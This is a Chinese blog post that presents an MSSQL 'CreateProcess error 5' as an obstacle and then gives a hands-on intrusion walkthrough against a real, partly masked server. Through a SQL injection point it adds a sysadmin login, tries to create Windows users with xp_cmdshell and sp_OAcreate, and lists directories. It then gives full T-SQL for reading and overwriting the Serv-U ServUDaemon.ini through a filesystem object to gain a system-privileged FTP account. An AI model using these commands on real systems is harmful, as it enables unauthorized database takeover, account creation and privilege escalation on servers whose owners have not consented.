辉克's Blog

创造机会的人是勇者;等待机会的人是愚者

29 03 2012

xpsql.cpp: 错误 5 来自 CreateProcess

辉克 | 系统服务 | 0

消息 50001,级别 1,状态 50001
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)
这个错误是因为 cmd设置了权限导致.
下面给些突破的方法吧
————————————————————-
1.MSSQL中一些扩展的应用
拿到地址后首先telnet一下它的1433。呵呵,这个可能很多朋友就不会注意为什么要先telnet呢?因为是SA嘛,只要能telnet上去我们就可以在注射点那里执行命令。加一个具有SA权限的sql用户上去,这样在查询分析器里执行命令要比在注射点那里方便的多呢。使用●telnet 61.129.251. x 1433 ●发现可以telnet上去. OK 马上在注射点后面执行:

exec master.dbo.sp_addlogin fishing hook;
exec master.dbo.sp_addsrvrolemember fishing,sysadmin

这个命令就是添加一个用户名为fishing密码为hook的SQL用户,权限为SA。两次执行页面都返回成功,说明用户添加成功了。使用SQL server的查询分析器连上,然后执行exec master.dbo.xp_cmdshell 'net user' 发现提示错误:

错误消息
50001,级别 1,状态 50001
xpsql.cpp: 错误 5 来自 CreateProcess(第 737 行)

很多朋友问过我这个错误信息是什么意思,这里解释一下,其实很简单,那个错误是明明写着 CreateProcess 进程无法创建,而xp_cmdshell 是执行什么进程大家应该知道吧,CMD这个进程无法创建!有可能CMD设置权限拒绝SYSTEM访问,有可能是CMD删除或者改名。以上情况都可以造成 CMD进程无法创建的。
看来直接想加用户登陆服务器是不可能了,可能有的朋友会说:不是还有SP_OAcreate 么?但是我在使用SP_OAcreate执行:

DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD
@shell,'run',null, 'C:\WINdows\system32\cmd.exe /c net user fish sadfish /add'

的时候虽然提示执行成功,但是却发现用户并没有添加进去,初步估计应该是wscript.shell被删掉了。
另外如果xp_regwrite 这个存储在的话我们还可以用沙盒模式搞定他的。不过虽然以上三个重要的存储过程都不能用,但是我们还可以用xp_subdirs来列目录。在列到D盘的时候发现了服务器装有serv-u,聪明的朋友们是不是想到了什么?我们可以通过使用FSO在suer-v的●ServUDaemon.ini●里写配置信息添加一个具有system权限的ftp用户,说做就做,首先使用

declare @o int, @f int, @t int, @ret int
declare @line varchar(8000)
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'opentextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'readline', @line out
while( @ret = 0 )
begin
print @line
exec @ret = sp_oamethod @f, 'readline', @line out
end

这段代码的意思是通过使用存储过程来读取d:\Serv-U6.3\ServUDaemon.ini里的配置信息,返回执行成功
既然可以读了 那么我们是不是可以写一个进去?继续执行

declare @o int, @f int, @t int, @ret int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'd:\Serv-U6.3\ServUDaemon.ini', 1
exec @ret = sp_oamethod @f, 'writeline', NULL, 《这里添写自己写好的SU配置信息,刚才复制的那些都要写上去,在最后添加我们自己的,跟我们在WEBSHELL里的serv-u提权是一样的》

按F5,执行一下,发现命令执行成功,马上使用上面的语句复查一下,发现已经写进去了
OK 剩下的事情就不用我多说了吧?FTP上去,直接添加用户登陆服务器就OK了,这里就不多废话了。

,

发表回复